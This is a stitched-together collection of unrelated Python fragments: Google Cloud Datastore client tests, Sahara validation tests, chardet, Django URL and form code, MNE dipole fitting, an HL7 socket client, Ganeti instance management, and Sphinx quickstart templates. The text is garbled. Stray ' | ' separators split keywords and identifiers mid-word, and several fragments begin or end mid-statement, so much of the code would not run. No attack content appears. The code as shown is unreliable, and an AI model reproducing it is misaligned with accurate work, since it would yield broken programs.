read_options=read_options,
)
d | ef test_get_multi_hit_multiple_keys_different_project(self):
from google.cloud.datastore.key import Key
PROJECT1 = "PROJECT"
PROJECT2 = "PROJECT-ALT"
# Make sure our IDs are actually diffe | rent.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key("KIND", 1234, project=PROJECT1)
key2 = Key("KIND", 1234, project=PROJECT2)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
def test_get_multi_max_loops(self):
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
deferred = []
missing = []
patch = mock.patch("google.cloud.datastore.client._MAX_LOOPS", new=-1)
with patch:
result = client.get_multi([key], missing=missing, deferred=deferred)
# Make sure we have no results, even though the connection has been
# set up as in `test_hit` to return a single result.
self.assertEqual(result, [])
self.assertEqual(missing, [])
self.assertEqual(deferred, [])
ds_api.lookup.assert_not_called()
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["entities"], [entity])
def test_put_multi_no_entities(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertIsNone(client.put_multi([]))
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/google-cloud-python/issues/649
from google.cloud.datastore.entity import Entity
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
def test_put_multi_no_batch_w_partial_key(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.helpers import _property_tuples
entity = _Entity(foo=u"bar")
key = entity.key = _Key(self.PROJECT)
key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds)
key_pb = _make_key(234)
ds_api = _make_datastore_api(key_pb)
client._datastore_api_internal = ds_api
result = client.put_multi([entity])
self.assertIsNone(result)
self.assertEqual(ds_api.commit.call_count, 1)
_, positional, keyword = ds_api.commit.mock_calls[0]
self.assertEqual(keyword, {"transaction": None})
self.assertEqual(len(positional), 3)
self.assertEqual(positional[0], self.PROJECT)
self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
mutations = positional[2]
|
#!/usr/bin/env python
import pickle
import argparse
f | rom pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('pickle', type=argparse.FileType('r'), help='path to location pickle')
args = parser.parse_args()
l = pickle.load(args.pi | ckle)
pprint(l)
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY | KIND, either express or
# implied.
# See the License for the specific l | anguage governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
je.check_job_executor(data, 0)
class FakeJob(object):
type = edp.JOB_TYPE_JAVA
libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobExecJavaValidation, self).setUp()
self._create_object_fun = wrap_it
self.scheme = je.JOB_EXEC_SCHEMA
@mock.patch('sahara.service.validations.base.check_edp_job_support')
@mock.patch('sahara.service.validations.base.check_cluster_exists')
@mock.patch('sahara.service.edp.api.get_job')
def test_java(self, get_job, check_cluster, check_oozie):
check_cluster.return_value = True
check_oozie.return_value = None
get_job.return_value = FakeJob()
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {"configs": {},
"params": {},
"args": []}
},
bad_req_i=(1, "INVALID_DATA",
"Java job must "
"specify edp.java.main_class"))
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {
"configs": {
"edp.java.main_class": "org.me.myclass"},
"params": {},
"args": []}
})
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == consta | nts.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLa | stChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
from django.conf.urls import url
from . import views
app_name = 'r | evisions'
urlpatterns = [
url(r'^revision/$', views.RevisionView.as_view(), name = 'revision'),
url(r'^mail/$', views.MailView.as_view(), name = ' | mail'),
]
|
[src['vertno']], nn=src['nn'][src['vertno']],
nuse=src['nuse'], coord_frame=src['coord_frame'],
vertno=np.arange(src['nuse']), type='discrete')
return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None,
lwork=None):
"""Calculate the residual sum of squares."""
if fwd_svd is None:
fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
uu, sing, vv = _repeated_svd(fwd, lwork, overwrite_a=True)
else:
uu, sing, vv = fwd_svd
gof = _dipole_gof(uu, sing, vv, B, B2)[0]
# mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
return 1. - gof
@functools.lru_cache(None)
def _get_ddot_dgemv_dgemm():
return _get_blas_funcs(np.float64, ('dot', 'gemv', 'gemm'))
def _dipole_gof(uu, sing, vv, B, B2):
"""Calculate the goodness of fit from the forward SVD."""
ddot, dgemv, _ = _get_ddot_dgemv_dgemm()
ncomp = 3 if sing[2] / (sing[0] if sing[0] > 0 else 1.) > 0.2 else 2
one = dgemv(1., vv[:ncomp], B) # np.dot(vv[:ncomp], B)
Bm2 = ddot(one, one) # np.sum(one * one)
gof = Bm2 / B2
return gof, one
def _fit_Q(fwd_data, whitener, B, B2, B_orig, rd, ori=None):
"""Fit the dipole moment once the location is known."""
from scipy import linalg
if 'fwd' in fwd_data:
# should be a single precomputed "guess" (i.e., fixed position)
assert rd is None
fwd = fwd_data['fwd']
assert fwd.shape[0] == 3
fwd_orig = fwd_data['fwd_orig']
assert fwd_orig.shape[0] == 3
scales = fwd_data['scales']
assert scales.shape == (3,)
fwd_svd = fwd_data['fwd_svd'][0]
else:
fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
rd[np.newaxis, :])
fwd_svd = None
if ori is None:
if fwd_svd is None:
fwd_svd = linalg.svd(fwd, full_matrices=False)
uu, sing, vv = fwd_svd
gof, one = _dipole_gof(uu, sing, vv, B, B2)
ncomp = len(one)
one /= sing[:ncomp]
Q = np.dot(one, uu.T[:ncomp])
else:
fwd = np.dot(ori[np.newaxis], fwd)
sing = np.linalg.norm(fwd)
one = np.dot(fwd / sing, B)
gof = (one * one)[0] / B2
Q = ori * np.sum(one / sing)
ncomp = 3
# Counteract the effect of column normalization
Q *= scales[0]
B_residual_noproj = B_orig - np.dot(fwd_orig.T, Q)
return Q, gof, B_residual_noproj, ncomp
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
guess_data, fwd_data, whitener, ori, n_jobs, rank):
"""Fit a single dipole to the given whitened, projected data."""
from scipy.optimize import fmin_cobyla
parallel, p_fun, _ = parallel_func(fun, n_jobs)
# parallel over time points
res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
guess_data, fwd_data, whitener,
fmin_cobyla, ori, rank)
for B, t in zip(data.T, times))
pos = np.array([r[0] for r in res])
amp = np.array([r[1] for r in res])
ori = np.array([r[2] for r in res])
gof = np.array([r[3] for r in res]) * 100 # convert to percentage
conf = None
if res[0][4] is not None:
conf = np.array([r[4] for r in res])
keys = ['vol', 'depth', 'long', 'trans', 'qlong', 'qtrans' | ]
conf = {key: conf[:, ki] for ki, key in enumerate(keys)}
khi2 = np.array([r[5] for r in res])
nfree = np.array([r[6] for r in res])
residual_noproj = np.array([r[7] for r in res]).T
return pos, amp, ori, gof, conf, | khi2, nfree, residual_noproj
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _fit_confidence(rd, Q, ori, whitener, fwd_data):
# As describedd in the Xfit manual, confidence intervals can be calculated
# by examining a linearization of model at the best-fitting location,
# i.e. taking the Jacobian and using the whitener:
#
# J = [∂b/∂x ∂b/∂y ∂b/∂z ∂b/∂Qx ∂b/∂Qy ∂b/∂Qz]
# C = (J.T C^-1 J)^-1
#
# And then the confidence interval is the diagonal of C, scaled by 1.96
# (for 95% confidence).
from scipy import linalg
direction = np.empty((3, 3))
# The coordinate system has the x axis aligned with the dipole orientation,
direction[0] = ori
# the z axis through the origin of the sphere model
rvec = rd - fwd_data['inner_skull']['r0']
direction[2] = rvec - ori * np.dot(ori, rvec) # orthogonalize
direction[2] /= np.linalg.norm(direction[2])
# and the y axis perpendical with these forming a right-handed system.
direction[1] = np.cross(direction[2], direction[0])
assert np.allclose(np.dot(direction, direction.T), np.eye(3))
# Get spatial deltas in dipole coordinate directions
deltas = (-1e-4, 1e-4)
J = np.empty((whitener.shape[0], 6))
for ii in range(3):
fwds = []
for delta in deltas:
this_r = rd[np.newaxis] + delta * direction[ii]
fwds.append(
np.dot(Q, _dipole_forwards(fwd_data, whitener, this_r)[0]))
J[:, ii] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# Get current (Q) deltas in the dipole directions
deltas = np.array([-0.01, 0.01]) * np.linalg.norm(Q)
this_fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis])[0]
for ii in range(3):
fwds = []
for delta in deltas:
fwds.append(np.dot(Q + delta * direction[ii], this_fwd))
J[:, ii + 3] = |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY | OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser | import parse_message
def query(host, port):
msg = \
'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
'RCP|I|'
# establish the connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# send the message
sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
# receive the answer
received = sock.recv(1024*1024)
return received
finally:
sock.close()
if __name__ == '__main__':
res = query('localhost', 6789)
print("Received response: ")
print(repr(res))
|
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
"""Shutdown an instance.
"""
HPATH = "instance-stop"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = BuildInstanceHookEnvByObject(self, self.instance)
env["TIMEOUT"] = self.op.timeout
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if not self.op.force:
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
else:
self.LogWarning("Ignoring offline instance check")
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
else:
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Shutdown the instance.
"""
# If the instance is offline we shouldn't mark it as down, as that
# resets the offline flag.
if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
self.cfg.MarkInstanceDown(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as stopped")
else:
result = self.rpc.call_inst | ance_shutdown(
self.instance.primary_node,
self.instance,
self.op.timeout, self.op.reason)
msg = resul | t.fail_msg
if msg:
self.LogWarning("Could not shutdown instance: %s", msg)
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReinstall(LogicalUnit):
"""Reinstall an instance.
"""
HPATH = "instance-reinstall"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
return BuildInstanceHookEnvByObject(self, self.instance)
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster and is not running.
"""
instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, instance.primary_node, "Instance primary node"
" offline, cannot reinstall")
if instance.disk_template == constants.DT_DISKLESS:
raise errors.OpPrereqError("Instance '%s' has no disks" %
self.op.instance_name,
errors.ECODE_INVAL)
CheckInstanceState(self, instance, INSTANCE_DOWN, msg="cannot reinstall")
if self.op.os_type is not None:
# OS verification
CheckNodeHasOS(self, instance.primary_node, self.op.os_type,
self.op.force_variant)
instance_os = self.op.os_type
else:
instance_os = instance.os
node_uuids = list(instance.all_nodes)
if self.op.osparams:
i_osdict = GetUpdatedParams(instance.osparams, self.op.osparams)
CheckOSParams(self, True, node_uuids, instance_os, i_osdict)
self.os_inst = i_osdict # the new dict (without defaults)
else:
self.os_inst = None
self.instance = instance
def Exec(self, feedback_fn):
"""Reinstall the instance.
"""
if self.op.os_type is not None:
feedback_fn("Changing OS to '%s'..." % self.op.os_type)
self.instance.os = self.op.os_type
# Write to configuration
self.cfg.Update(self.instance, feedback_fn)
StartInstanceDisks(self, self.instance, None)
try:
feedback_fn("Running the instance OS create scripts...")
# FIXME: pass debug option from opcode to backend
result = self.rpc.call_instance_os_add(self.instance.primary_node,
(self.instance, self.os_inst),
True, self.op.debug_level)
result.Raise("Could not install OS for instance %s on node %s" %
(self.instance.name,
self.cfg.GetNodeName(self.instance.primary_node)))
finally:
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReboot(LogicalUnit):
"""Reboot an instance.
"""
HPATH = "instance-reboot"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"IGNORE_SECONDARIES": self.op.ignore_secondaries,
"REBOOT_TYPE": self.op.reboot_type,
"SHUTDOWN_TIMEOUT": self.op.shutdown_timeout,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
CheckNodeOnline(self, self.instance.primary_node)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
def Exec(self, feedback_fn):
"""Reboot the instance.
"""
cluster = self.cfg.GetClusterInfo()
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node))
instance_running = bool(remote_info.payload)
current_node_uuid = self.instance.primary_node
if instance_running and \
self.op.reboot_type in [constants.INSTANCE_REBOOT_SOFT,
constants.INSTANCE_REBOOT_HARD]:
result = self.rpc.call_instance_reboot(current_node_uuid, self.instance,
self.op.reboot_type,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not reboot instance")
else:
if instance_running:
result = self.rpc.call_instance_shutdown(current_node_uuid,
self.instance,
self.op.shutdown_timeout,
|
__all__ | = ['ttypes' | , 'constants', 'PlayerStrategy']
|
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
# date_paiement = forms.HiddenInput()
# financement_location = forms.HiddenInput()
date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
input_formats=[DATE_FORMAT, ],
required=False)
class Meta:
model = mdl.suivi_loyer.SuiviLoyer
fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
'date_paiement_reel']
def __init__(self, *args, **kwargs):
super(SuiviForm, self).__init__(*args, **kwargs)
self.fields['date_paiement'].widget = forms.HiddenInput()
self.fields['financement_location'].widget = forms.HiddenInput()
self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
if self.instance:
self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
def clean(self):
self.validate_dates()
self.validate_status()
def validate_status(self):
if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
(self.cleaned_data.get("loyer_percu") is None o | r self.cleaned_data.get("loyer_percu") == 0) and \
(self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
self._errors["etat_suivi"] = self.error_class([msg])
def validate_dates(self):
date_paiement = self.cleaned_data.get("date_paiement")
date_paiement_reel = self.cleaned_dat | a.get("date_paiement_reel")
if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
self._errors["date_paiement_reel"] = self.error_class([msg])
|
he given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('%(master)s', '%(project_fn)s.tex', '%(project)s Documentation',
'%(author)s', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
'''
MASTER_FILE = '''\
.. %(project)s documentation master file, created by sphinx-quickstart on %(now)s.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to %(project)s's documentation!
===========%(underline)s=================
Contents:
.. toctree::
:maxdepth: 2
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
'''
MAKEFILE = '''\
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d %(rbuilddir)s/doctrees $(PAPEROPT_$(PAPER)) \
$(SPHINXOPTS) %(rsrcdir)s
.PHONY: help clean html web pickle htmlhelp latex changes linkcheck
help:
\t@echo "Please use \\`make <target>' where <target> is one of"
\t@echo " html to make standalone HTML files"
\t@echo " pickle to make pickle files (usable by e.g. sphinx-web)"
\t@echo " htmlhelp to make HTML files and a HTML help project"
\t@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
\t@echo " changes to make an overview over all changed/added/deprecated items"
\t@echo " linkcheck to check all external links for integrity"
clean:
\t-rm -rf %(rbuilddir)s/*
html:
\tmkdir -p %(rbuilddir)s/html %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) %(rbuilddir)s/html
\t@echo
\t@echo "Build finished. The HTML pages are in %(rbuilddir)s/html."
pickle:
\tmkdir -p %(rbuilddir)s/pickle %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) %(rbuilddir)s/pickle
\t@echo
\t@echo "Build finished; now you can process the pickle files or run"
\t@echo " sphinx-web %(rbuilddir)s/pickle"
\t@echo "to start the sphinx-web server."
web: pickle
htmlhelp:
\tmkdir -p %(rbuilddir)s/htmlhelp %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) %(rbuilddir)s/htmlhelp
\t@echo
\t@echo "Build finished; now you can run HTML Help Workshop with the" \\
\t ".hhp project file in %(rbuilddir)s/htmlhelp."
latex:
\tmkdir -p %(rbuilddir)s/latex %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) %(rbuilddir)s/latex
\t@echo
\t@echo "Build finished; the LaTeX files are in %(rbuilddir)s/latex."
\t@echo "Run \\`make all-pdf' or \\`make all-ps' in that directory to" \\
\t "run these through (pdf)latex."
changes:
\tmkdir -p %(rbuilddir)s/changes %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) %(rbuilddir)s/changes
\t@echo
\t@echo "The overview file is in %(rbuilddir)s/changes."
linkcheck:
\tmkdir -p %(rbuilddir)s/linkcheck %(rbuilddir)s/doctrees
\t$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) %(rbuilddir)s/linkcheck
\t@echo
\t@echo "Link check complete; look for any errors in the above output " \\
\t "or in %(rbuilddir)s/linkcheck/output.txt."
'''
def mkdir_p(dir):
if path.isdir(dir):
return
os.makedirs(dir)
def is_path(x):
"""Please enter a valid path name."""
return path.isdir(x) or not path.exists(x)
def nonempty(x):
"""Please enter some text."""
return len(x)
def choice(*l):
def val(x):
return x in l
val.__doc__ = 'Please enter one of %s.' % ', '.join(l)
return val
def boolean(x):
"""Please enter either 'y' or 'n'."""
return x.upper() in ('Y', 'YES', 'N', 'NO')
def suffix(x):
"""Please enter a file suffix, e.g. '.rst' or '.txt'."""
